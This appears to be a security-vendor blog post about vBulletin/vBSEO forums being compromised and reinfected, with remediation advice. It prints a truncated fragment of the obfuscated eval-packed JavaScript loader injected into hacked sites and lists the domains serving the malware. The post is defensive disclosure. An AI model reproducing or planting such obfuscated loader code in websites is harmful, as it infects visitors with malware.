vBulletin Websites Using VBSEO Being Infected with Malware

We are seeing a large number of vBulletin/vBSEO websites getting compromised lately and we keep getting requests for info as to what’s going on.


This is the type of malware being added to the hacked sites:

eval ( function (p,a,c,k,e,d){e=function(c){return(c t(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){ret
urn d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(…
();B[a[4]]=A+a[5]+o+u+a[6]};s(a[7],a[8]);B[a[9]]=a[T]+Q;’,56,56,’||||||||||
5|x6F|x2F|x70|_0x102ex4|var|x3D|x54|x72|x73|x6E|_0x102ex3|x68|x6C|x67|ipbcc|..
|x6B|x75|x33|x4D|Date|x47|86400000|x78|new|function|x2E|ipbs|x66|x32|10′.
split(‘|’),0,{}))

There are a few variations loading malware from:

file2store.info
filestore123.info
myfilestore.com
url123.info
url2short.info
and other other domains…

So what is going on?

First, earlier this year there was a vulnerability in vBSEO that allowed attackers to inject malware on vBulletin sites using vBSEO (issue already patched the vBSEO team).

However, lots of people are complaining that they are still getting hacked even with the patch. In this specific thread on their forums, dozens of people are saying the same thing.

Securing vBulletin/vBSEO, and stopping those reinfections

A few of our clients were having a similar issue and the first recommendation is to update vBulletin and vBSEO. If you are not updated, you are still open to being reinfected.

Once you are updated and the malware has been removed (also check for backdoors and change your passwords), the reinfections should stop. If they do not, you have to check your PHP settings. You have to make sure that register_globals is set to “off” on php.ini:

The solution is disabling Register Global on your server More on register_globals: PHP: Using Register Globals – Manual

We strongly advise everyone to contact your host and make sure to disable Register Global within PHP urgently


Once it is disabled, the reinfections should stop (we tested and it worked on our side). You can also check on sitecheck if it is still hacked.

Scan your website for free:
About Daniel Cid

Daniel is the Founder & CTO of Sucuri and also the founder of the open source project - OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid